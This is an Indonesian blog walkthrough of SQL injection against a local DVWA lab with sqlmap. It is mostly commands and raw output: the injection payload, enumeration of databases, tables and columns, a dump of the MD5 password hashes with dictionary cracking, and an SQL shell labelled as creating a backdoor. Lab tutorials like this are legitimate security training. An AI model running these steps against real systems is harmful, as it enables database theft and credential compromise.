Daftar Blog Saya

Senin, 05 Maret 2012

Advance Web Hacking

1.open mantra
2.add url localhost:8080 and open dvwa with security medium
3.open open burp suite to damp in mantra
4.open terminal and type

root@bt:~# cd /pentest/database/sqlmap/


5. check database used sqlmap

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=%27&Submit=Submit" --cookie "security=medium; PHPSESSID=2p9kki5hbjsvupbavnl95jqpl7" --dbs

    sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 21:59:30

[21:59:32] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[21:59:32] [INFO] resuming injection data from session file
[21:59:32] [INFO] resuming back-end DBMS 'mysql 5' from session file
[21:59:32] [INFO] testing connection to the target url
[21:59:32] [INFO] heuristics detected web page charset 'ascii'
[21:59:32] [WARNING] there is a DBMS error found in the HTTP response bodywhich could interfere with the results of the tests
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=' UNION ALL SELECT CONCAT(CHAR(58,105,102,116,58),CHAR(66,105,66,104,70,122,65,113,102,109),CHAR(58,105,118,106,58)), NULL# &Submit=Submit
---

[21:59:32] [INFO] manual usage of GET payloads requires url encoding
[21:59:32] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
[21:59:32] [INFO] fetching database names
[21:59:32] [INFO] read from file '/pentest/database/sqlmap/output/localhost/session': information_schema, dvwa, fbip, mysql
available databases [4]:
[*] dvwa
[*] fbip
[*] information_schema
[*] mysql

[21:59:32] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 21:59:32

6. check table

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=%27&Submit=Submit" --cookie "security=medium; PHPSESSID=2p9kki5hbjsvupbavnl95jqpl7" -D dvwa --tables

    sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 22:12:39

[22:12:40] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[22:12:40] [INFO] resuming injection data from session file
[22:12:40] [INFO] resuming back-end DBMS 'mysql 5' from session file
[22:12:40] [INFO] testing connection to the target url
[22:12:40] [INFO] heuristics detected web page charset 'ascii'
[22:12:40] [WARNING] there is a DBMS error found in the HTTP response bodywhich could interfere with the results of the tests
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=' UNION ALL SELECT CONCAT(CHAR(58,105,102,116,58),CHAR(66,105,66,104,70,122,65,113,102,109),CHAR(58,105,118,106,58)), NULL# &Submit=Submit
---

[22:12:40] [INFO] manual usage of GET payloads requires url encoding
[22:12:40] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
[22:12:40] [INFO] fetching tables for database: dvwa
[22:12:40] [INFO] read from file '/pentest/database/sqlmap/output/localhost/session': dvwa, guestbook, dvwa, users
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+

[22:12:41] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 22:12:41


7. check columns in user

 root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=%27&Submit=Submit" --cookie "security=medium; PHPSESSID=2p9kki5hbjsvupbavnl95jqpl7" -D dvwa -T users --column

    sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 22:20:07

[22:20:07] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[22:20:07] [INFO] resuming injection data from session file
[22:20:07] [INFO] resuming back-end DBMS 'mysql 5' from session file
[22:20:07] [INFO] testing connection to the target url
[22:20:07] [INFO] heuristics detected web page charset 'ascii'
[22:20:07] [WARNING] there is a DBMS error found in the HTTP response bodywhich could interfere with the results of the tests
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=' UNION ALL SELECT CONCAT(CHAR(58,105,102,116,58),CHAR(66,105,66,104,70,122,65,113,102,109),CHAR(58,105,118,106,58)), NULL# &Submit=Submit
---

[22:20:07] [INFO] manual usage of GET payloads requires url encoding
[22:20:07] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
[22:20:07] [INFO] fetching columns for table 'users' on database 'dvwa'
[22:20:07] [INFO] read from file '/pentest/database/sqlmap/output/localhost/session': user_id, int(6), first_name, varchar(15), last_name, varchar(15), user, varchar(15), password, varchar(32), avatar, varchar(70)
Database: dvwa
Table: users
[6 columns]
+------------+-------------+
| Column     | Type        |
+------------+-------------+
| avatar     | varchar(70) |
| first_name | varchar(15) |
| last_name  | varchar(15) |
| password   | varchar(32) |
| user       | varchar(15) |
| user_id    | int(6)      |
+------------+-------------+

[22:20:07] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 22:20:07


8. check user name and password

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=%27&Submit=Submit" --cookie "security=medium; PHPSESSID=2p9kki5hbjsvupbavnl95jqpl7" -D dvwa -T users -C password --dump

    sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 22:22:44

[22:22:44] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[22:22:44] [INFO] resuming injection data from session file
[22:22:44] [INFO] resuming back-end DBMS 'mysql 5' from session file
[22:22:44] [INFO] testing connection to the target url
[22:22:44] [INFO] heuristics detected web page charset 'ascii'
[22:22:44] [WARNING] there is a DBMS error found in the HTTP response bodywhich could interfere with the results of the tests
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=' UNION ALL SELECT CONCAT(CHAR(58,105,102,116,58),CHAR(66,105,66,104,70,122,65,113,102,109),CHAR(58,105,118,106,58)), NULL# &Submit=Submit
---

[22:22:44] [INFO] manual usage of GET payloads requires url encoding
[22:22:44] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
do you want to use LIKE operator to retrieve column names similar to the ones provided with the -C option? [Y/n] y
[22:22:50] [INFO] fetching columns LIKE 'password' for table 'users' on database 'dvwa'
[22:22:50] [INFO] read from file '/pentest/database/sqlmap/output/localhost/session': password, varchar(32)
[22:22:50] [INFO] fetching column(s) 'password' entries for table 'users' on database 'dvwa'
[22:22:50] [INFO] read from file '/pentest/database/sqlmap/output/localhost/session': 5f4dcc3b5aa765d61d8327deb882cf99, e99a18c428cb38d5f260853678922e03, 8d3533d75ae2c3966d7e0d4fcc69216b, 0d107d09f5bbe40cade3de5c71e9e9b7, 5f4dcc3b5aa765d61d8327deb882cf99
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
[22:23:02] [INFO] using hash method: 'md5_generic_passwd'
what's the dictionary's location? [/pentest/database/sqlmap/txt/wordlist.txt]
[22:23:36] [INFO] loading dictionary from: '/pentest/database/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] n
[22:23:50] [INFO] starting dictionary attack (md5_generic_passwd)
[22:23:51] [INFO] found: 'abc123' for hash: 'e99a18c428cb38d5f260853678922e03'                                              
[22:23:51] [INFO] found: 'charley' for hash: '8d3533d75ae2c3966d7e0d4fcc69216b'                                             
[22:23:52] [INFO] found: 'letmein' for hash: '0d107d09f5bbe40cade3de5c71e9e9b7'                                             
[22:23:52] [INFO] found: 'password' for hash: '5f4dcc3b5aa765d61d8327deb882cf99'                                            
Database: dvwa                                                                                                              
Table: users
[4 entries]
+---------------------------------------------+
| password                                    |
+---------------------------------------------+
| 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  |
| 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  |
| e99a18c428cb38d5f260853678922e03 (abc123)   |
| 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
+---------------------------------------------+

[22:23:52] [INFO] Table 'dvwa.users' dumped to CSV file '/pentest/database/sqlmap/output/localhost/dump/dvwa/users.csv'
[22:23:52] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 22:23:52


9.creating backdoor

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=%27&Submit=Submit" --cookie "security=medium; PHPSESSID=2p9kki5hbjsvupbavnl95jqpl7" --sql-shell

    sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool                                                     
    http://sqlmap.sourceforge.net
                                                                                                                                    
[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.                                                                       

[*] starting at: 22:44:40                                                                                                           

[22:44:40] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[22:44:40] [INFO] resuming injection data from session file
[22:44:40] [INFO] resuming back-end DBMS 'mysql 5' from session file
[22:44:40] [INFO] testing connection to the target url
[22:44:41] [INFO] heuristics detected web page charset 'ascii'
[22:44:41] [WARNING] there is a DBMS error found in the HTTP response bodywhich could interfere with the results of the tests       
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=' UNION ALL SELECT CONCAT(CHAR(58,105,102,116,58),CHAR(66,105,66,104,70,122,65,113,102,109),CHAR(58,105,118,106,58) NULL# &Submit=Submit
---

[22:44:41] [INFO] manual usage of GET payloads requires url encoding
[22:44:41] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
[22:44:41] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell> show databases;
do you want to retrieve the SQL statement output? [Y/n/a] y
[22:46:05] [INFO] fetching SQL SELECT statement query output: 'show databases;'
[22:46:05] [WARNING] if the problem persists with 'None' values please try to use hidden switch --no-cast (fixing problems with somcollation issues)
sql-shell>
[00:59:35] [ERROR] user aborted
sql-shell>
[1]+  Stopped                 ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=%27&Submit=Submit" --cookie "security=dium; PHPSESSID=2p9kki5hbjsvupbavnl95jqpl7" --sql-shell
root@bt:/pentest/database/sqlmap# mysql -h 192.168.56.1 -u root -p
Enter password:
ERROR 2003 (HY000): Can't connect to MySQL server on '192.168.56.1' (101)

Tidak ada komentar:

Posting Komentar